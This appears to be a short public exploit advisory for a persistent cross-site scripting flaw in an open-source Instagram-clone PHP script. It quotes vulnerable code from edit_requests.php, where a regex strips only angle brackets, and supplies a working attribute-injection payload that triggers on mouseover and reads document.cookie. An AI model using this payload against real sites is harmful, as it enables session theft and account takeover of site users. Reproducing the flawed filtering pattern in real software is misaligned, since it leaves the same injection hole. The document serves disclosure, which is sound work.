# Exploit Title: Instagram-clone script 2.0 - Persistent cross site scripting
# Date: 2018-07-08
# Exploit Author: L0RD
# Email: borna.nematzadeh123@gmail.com
# Software Link: https://github.com/yTakkar/Instagram-clone/archive/master.zip
# Vendor Homepage: https://github.com/yTakkar/Instagram-clone
# Version: 2.0
# Tested on: Kali linux
=================================================
# POC : Persistent Cross site scripting
# vulnerable file : edit_requests.php
# vulnerable code :
if (isset($_POST['username'])) {
$username = preg_replace("#[<> ]#i", "", $_POST['username']);
$firstname = preg_replace("#[<> ]#i", "", $_POST['firstname']);
$surname = preg_replace("#[<> ]#i", "", $_POST['surname']);
$bio = preg_replace("#[<>]#i", "", $_POST['bio']);
$instagram = preg_replace("#[<>]#i", "", $_POST['instagram']);
$youtube = preg_replace("#[<>]#i", "", $_POST['youtube']);
$facebook = preg_replace("#[<>]#i", "", $_POST['facebook']);
$twitter = preg_replace("#[<>]#i", "", $_POST['twitter']);
$website = preg_replace("#[<>]#i", "", $_POST['website']);
$mobile = preg_replace("#[^0-9]#i", "", $_POST['mobile']);
$tags = preg_replace("#[\s]#", "-", $_POST['tags']);
$session = $_SESSION['id'];
$m=$edit->saveProfileEditing($username, $firstname, $surname, $bio, $instagram, $youtube, $facebook, $twitter, $website, $mobile, $tags);
$array = array("mssg" => $m);
echo json_encode($array);
}
# preg_replace() function replaces "<>" with null.
So we use this payload to bypass regex :
# Payload : "onmouseover=" alert(document.cookie)
=================================================